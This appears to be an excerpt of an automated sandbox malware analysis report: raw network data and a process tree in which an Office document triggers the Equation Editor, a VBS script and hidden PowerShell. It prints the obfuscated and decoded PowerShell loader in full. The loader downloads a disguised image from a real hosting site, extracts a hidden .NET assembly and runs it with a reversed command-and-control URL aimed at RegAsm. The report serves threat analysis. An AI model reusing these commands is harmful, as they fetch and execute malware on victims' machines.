2024-05-27 16:35:36 UTC	1369	IN	Data Raw: 5c 6d c4 1f 54 e1 fc c6 72 37 71 4c 7a fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70 1b 1a b2 58 9b af 86 10 6a 83 70 c4 13 ef ed 88 ec 2c c7 a8 ac a9 47 57 ba 24 55 f1 81 a3 bd 9d 96 98 71 dc e5 5e 42 a5 bd 56 40 bf 86 2e 8c 01 50 7b e4 3b 30 6b 09 60 f0 6f a5 60 59 f5 4d d0 1b e2 f1 49 b5 74 a7 77 43 c5 e1 24 65 0a d4 45 8e c3 12 d8 b3 ab 2b 30 e3 9c 00 78 66 bb 4a 8d 2e 9f 4e 79 57 2c d6 73 45 75 8a 1b 69 60 2f a6 65 68 fc 3f 4f 0e b6 51 18 51 23 f2 79 ea 31 8d 58 8f 4f 0b 4f 35 05 41 ba fa 60 31 e2 1e 2d 16 82 07 9a 57 00 28 a0 3d ce 2b a3 f1 45 d4 e9 44 e2 c6 ee 68 e7 8b 79 e6 fb 53 e2 bb 01 2b a5 8b d4 07 be 7a b8 95 60 d3 ac 61 00 0a 28 01 df Data Ascii: \mTr7qLz2iO7ZsiA%nGR?{O\|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+EDhyS+z`a(
2024-05-27 16:35:36 UTC	1369	IN	Data Raw: 3e f8 03 32 f9 ca c8 48 50 a3 af 73 92 1d 11 95 63 62 c2 b9 b1 9d 2e 98 46 14 06 1e af a8 c1 24 65 25 00 b0 2a 7a 9f 86 06 ae 85 92 2a 49 4d b1 4a a0 2e af 17 d5 44 04 a0 d9 00 37 e1 be b8 7d 23 23 48 18 20 6d b6 07 6c 36 a5 d2 66 08 83 6d 0b 22 ba e0 05 bc 37 4c f1 79 82 46 16 bb af ad fc 30 6a 9a 78 d6 b7 a0 20 d9 2b b8 11 fa 63 62 24 8d 89 67 01 54 32 ed 63 d2 86 2a 1f ef 0e 5e 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8 a9 5e 84 Data Ascii: >2HPscb.F$e%zIMJ.D7}##H ml6fm"7LyF0jx +cb$gT2c*^8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW\|Rm\LITUTVlD#v aT@v@b^
2024-05-27 16:35:36 UTC	1369	IN	Data Raw: 34 1e 1a 3c a4 52 cc a5 76 d0 0c 4f 4b 61 78 1e 78 15 7e ab 7f 0c 63 4e 88 d2 84 31 17 b1 e9 50 c5 6b ea 30 22 c0 e2 f7 77 1d 86 71 90 af 73 7f 0c 0d 43 a1 a5 e3 4c a6 bb 89 5b 8f 9f a7 2a fa 22 bb 6f 4c b4 4d 7a 64 6a fa f1 8a c1 ac 9c cf 12 99 a6 71 b8 0d aa c6 cf 3d 33 d1 ce ea fa 56 31 a2 db 10 9c 80 6f ad 8a 3d aa ef 9c 0c 73 a0 43 75 a6 5a 06 8d cc c3 fa 67 2e 89 28 56 91 48 3d 0f 9a 48 fc eb 3d 01 82 3f 3b 72 a4 61 aa ba 00 55 7d 85 0e 9f 5c 21 86 c0 b0 a4 7b 0c 0f 3c 34 4a c7 8d 3a 90 3f fb 69 e3 ff 00 0e 17 4f e0 b3 4f 32 bc 5a 55 5e 6c 39 9d 97 69 1d 0f e1 eb 79 b8 23 8d 48 a2 01 ec 08 b1 92 0c 85 c9 f3 4d 8f 73 55 80 ac fe 0b 0e b3 c4 97 59 1c ac b2 ab 2b 48 cc cb 6a 55 46 d2 ab 55 46 8d df 4f 8f 4c c7 d4 e8 9b 4f 3e a4 69 b4 10 88 a1 6d c1 e6 Data Ascii: 4<RvOKaxx~cN1Pk0"wqsCL[*"oLMzdjq=3V1o=sCuZg.(VH=H=?;raU}\!{<4J:?iOO2ZU^l9iy#HMsUY+HjUFUFOLO>im
2024-05-27 16:35:36 UTC	1369	IN	Data Raw: 3a 06 01 54 90 2e fa 66 7b a3 f9 62 40 a4 5d 7e 2e fc 60 2f 1a a2 3f 24 93 54 4f 61 8e 2d 4a 9b 56 e9 7a d6 26 59 88 36 aa 2b db 0b 1f 99 15 6d e7 70 bc 03 c9 28 8d 76 ef 00 f4 e7 28 60 0a 81 81 52 b4 4f 18 35 2c 75 54 e8 38 e8 48 be d8 e8 53 3c 2c a3 69 da 3a 03 47 f2 c0 41 b6 ae 98 28 71 ea e0 93 db 20 c6 87 4c 44 64 b1 2d 74 3e 58 ab 02 ac 45 11 cf 7c 6b 46 76 ab 10 81 be 78 14 92 09 56 15 77 71 b7 b0 38 c4 53 9d 52 ac 12 c4 0a a8 fc 43 a8 c0 49 1c f3 7a c2 96 5f 61 db 02 92 3c 36 14 95 f7 b1 80 6d 62 69 90 a8 81 f7 7f 88 9c 8d 14 eb a7 9c 3b 0b 5e f8 23 0b ed 57 23 86 e9 83 e4 58 c0 f4 4f af 86 d9 1b a1 1b 94 fb 9c 04 3e 27 3c 5a 95 96 34 2c 3f 0f 1e f9 89 cd 8b c7 a1 98 a4 41 4a 85 fe 21 7d f0 0f ad f1 4d 6b 6b 19 98 b2 1b e1 7d b1 87 d3 cd a9 d3 2c Data Ascii: :T.f{b@]~.`/?$TOa-JVz&Y6+mp(v(`RO5,uT8HS<,i:GA(q LDd-t>XE\|kFvxVwq8SRCIz_a<6mbi;^#W#XO>'<Z4,?AJ!}Mkk},
2024-05-27 16:35:36 UTC	1369	IN	Data Raw: 47 db 1d 13 85 1f 76 75 23 8f 4d 56 78 a0 db 5c 89 23 5d bd be 18 60 c1 e2 dc 63 5a 51 55 ef 81 e8 13 ed 54 52 b8 67 d3 35 06 21 42 f7 c7 f5 3f 6b f4 b0 e9 83 36 96 50 38 1c 1a 39 e4 21 7b e1 23 51 ec 79 eb 87 62 25 fd dc 88 ac 3b f2 70 37 0f da d8 1e 20 cb a5 9a 8f bb 62 69 f6 af 4b bd 80 d2 4a 0d f3 6d 99 4e a1 18 aa 00 54 76 ba c5 66 01 19 58 46 a0 9e 4d 1b c0 f4 9f fc 4d a0 59 96 63 a2 70 ed c7 5e 71 6d 5f da 5d 16 bb 4c d0 49 a3 93 67 00 8b eb 9e 73 57 aa 68 d3 7e d0 c7 b7 c3 07 0e a5 a7 87 70 00 71 c8 1e f8 1a de 1f e2 fa 0f 09 59 57 4d a1 98 96 3c 96 ec 31 98 be d6 69 8b 94 3a 47 51 d4 1b eb 98 7a 67 79 94 a1 b0 41 ac 60 e9 d5 c8 26 35 b5 e3 9e 30 35 9b ed 4c 09 3b 37 91 20 42 bd 3e 39 57 fb 53 a7 53 ea d3 48 54 fc 73 38 e9 8b 72 d1 aa a8 e3 ae 53 Data Ascii: Gvu#MVx\#]`cZQUTRg5!B?k6P89!{#Qyb%;p7 biKJmNTvfXFMMYcp^qm_]LIgsWh~pqYWM<1i:GQzgyA`&505L;7 B>9WSSHTs8rS
2024-05-27 16:35:36 UTC	1369	IN	Data Raw: 57 5f 34 2f a5 6d 8c cd d3 9f 6e 71 af 23 4f 2a 2a 19 ce e6 21 78 42 07 e7 8a 6a fc 36 18 23 94 09 98 95 e9 cf 5c 04 9d 56 48 91 90 b1 a5 a2 3f ae 5c b2 4a ea cb 1a 92 00 5a 51 db df 2f a3 d8 a4 ab 10 23 22 c9 ee 49 ed 97 45 58 dd bc b1 e9 e8 d6 3a 57 38 03 48 9b ce e1 c8 37 c5 71 58 cc 40 34 92 16 56 25 56 c1 39 29 13 cc cc c3 8d a6 f2 f2 b1 d8 52 36 05 82 d3 57 d3 00 0f 36 e7 24 a9 6d c4 d0 1c e0 52 17 2e c4 13 63 db 8e 31 85 d3 ee 89 5c 1d ac b6 4f be 2b 36 a9 a1 b5 04 97 ef 7d b0 08 b0 97 3d 79 5e a7 13 9d 97 7e e1 5b b2 3c d9 ca ef 2d 4a c6 b2 d3 45 12 51 56 bb 17 f5 c0 e8 b5 0c 7d 3b aa ba 1f 7c 31 d4 c8 06 ed a4 af 7a c4 95 77 72 38 af 86 30 db cb 14 2f 60 76 18 04 49 3c c5 52 b4 08 fc 40 fc f1 89 1b 69 da 2a ab af c7 12 89 1d 24 21 40 03 83 ce 16 Data Ascii: W_4/mnq#O*!xBj6#\VH?\JZQ/#"IEX:W8H7qX@4V%V9)R6W6$mR.c1\O+6}=y^~[<-JEQV};\|1zwr80/`vI<R@i$!@
2024-05-27 16:35:36 UTC	1369	IN	Data Raw: ce 8b 40 74 f1 23 89 4b 32 c8 64 7d de db 48 a3 f1 04 93 7e d8 8e af c5 f5 07 57 12 0d 39 d3 a6 e0 c4 b2 db 15 27 36 1e 09 5e 16 48 e4 65 0c 49 0d 60 70 47 b0 1d 7e a3 01 49 74 6b a9 8d 4e e2 50 a2 b6 d5 e4 1e 49 35 5c 59 f7 c6 84 70 a0 0c 23 0a 15 78 25 79 03 db 32 f4 11 eb 24 f1 a6 3a a9 e9 51 2f 62 31 0a 18 dd 0a ee 48 e4 e6 bc 8a ea db 55 0c 9c 85 36 68 55 e0 7c f3 ed 4a be 9b c4 d0 47 34 a5 5d 43 72 6a ba f1 9c 9a 8d 34 fa 38 fc e5 32 35 ed 0a 41 e0 9b 3d 47 3d b1 df b4 70 a6 a3 c7 e1 47 00 2f 93 7c 76 00 1e f9 e7 0a 9d 3e a4 84 2a c5 4d ab 29 b1 f0 fd 70 1c d6 68 d7 4a c1 96 65 65 6e 42 f3 78 a1 7d c7 36 f4 fe 1b 36 ae 17 d4 4f ea 91 d7 d0 a5 bf 13 76 24 df 18 b6 ab 45 14 5a 58 5c 3a ac db 03 32 96 14 dd 41 20 fc 0e 06 68 bb eb 43 0d 04 07 53 a8 8e Data Ascii: @t#K2d}H~W9'6^HeI`pG~ItkNPI5\Yp#x%y2$:Q/b1HU6hU\|JG4]Crj4825A=G=pG/\|v>*M)phJeenBx}66Ov$EZX\:2A hCS

Target ID:	0
Start time:	12:34:49
Start date:	27/05/2024
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Imagebase:	0x13f630000
File size:	28'253'536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	12:35:10
Start date:	27/05/2024
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
Imagebase:	0x13fba0000
File size:	1'423'704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	12:35:22
Start date:	27/05/2024
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543'304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	12:35:24
Start date:	27/05/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\lionarekingofjungleimageshe.vbs"
Imagebase:	0xc10000
File size:	141'824 bytes
MD5 hash:	979D74799EA6C8B8167869A68DF5204A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	12:35:27
Start date:	27/05/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreRwBCDgTreFIDgTreLwDgTrewDgTreDgDgTreMDgTreDgTre4DgTreC8DgTreNgDgTre1DgTreDEDgTreLgDgTre3DgTreDcDgTreMQDgTreuDgTreDYDgTreNDgTreDgTreuDgTreDgDgTreOQDgTrexDgTreC8DgTreLwDgTre6DgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGQDgTreZQBzDgTreGEDgTredDgTreBpDgTreHYDgTreYQBkDgTreG8DgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGQDgTreZQBzDgTreGEDgTredDgTreBpDgTreHYDgTreYQBkDgTreG8DgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGQDgTreZQBzDgTreGEDgTredDgTreBpDgTreHYDgTreYQBkDgTreG8DgTreJwDgTresDgTreCcDgTreUgBlDgTreGcDgTreQQBzDgTreG0DgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
Imagebase:	0xc10000
File size:	427'008 bytes
MD5 hash:	EB32C070E658937AA9FA9F3AE629B2B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	12:35:29
Start date:	27/05/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GBR/0808/651.771.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }"
Imagebase:	0xc10000
File size:	427'008 bytes
MD5 hash:	EB32C070E658937AA9FA9F3AE629B2B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000C.00000002.471104189.00000000082D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	12:35:43
Start date:	27/05/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
